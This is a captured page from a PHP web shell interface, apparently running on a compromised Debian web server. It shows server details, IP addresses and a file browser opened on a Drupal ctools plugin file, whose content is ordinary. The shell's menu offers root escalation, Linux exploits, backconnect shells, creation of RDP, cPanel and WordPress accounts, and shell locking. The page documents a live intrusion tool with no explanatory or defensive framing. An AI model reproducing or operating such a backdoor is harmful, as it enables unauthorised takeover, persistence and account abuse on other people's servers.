Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.255.239
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
ctools /
plugins /
export_ui /
[ HOME SHELL ]
Name
Size
Permission
Action
ctools_export_ui.class.php
49.05
KB
-rw-r--r--
ctools_export_ui.inc
665
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ctools_export_ui.inc
<?php /** * The default plugin exists only to provide the base class. Other plugins * which do not provide a class will get this class instead. Any classes * provided should use this class as their parent: * * @code * 'handler' => array( * 'class' => 'ctools_export_ui_mine', * 'parent' => 'ctools_export_ui', * ), * @endcode * * Using the above notation will ensure that this plugin's is loaded before * the child plugin's class and avoid whitescreens. */ $plugin = array( // As this is the base class plugin, it shouldn't declare any menu items. 'has menu' => FALSE, 'handler' => array( 'class' => 'ctools_export_ui', ), );
Close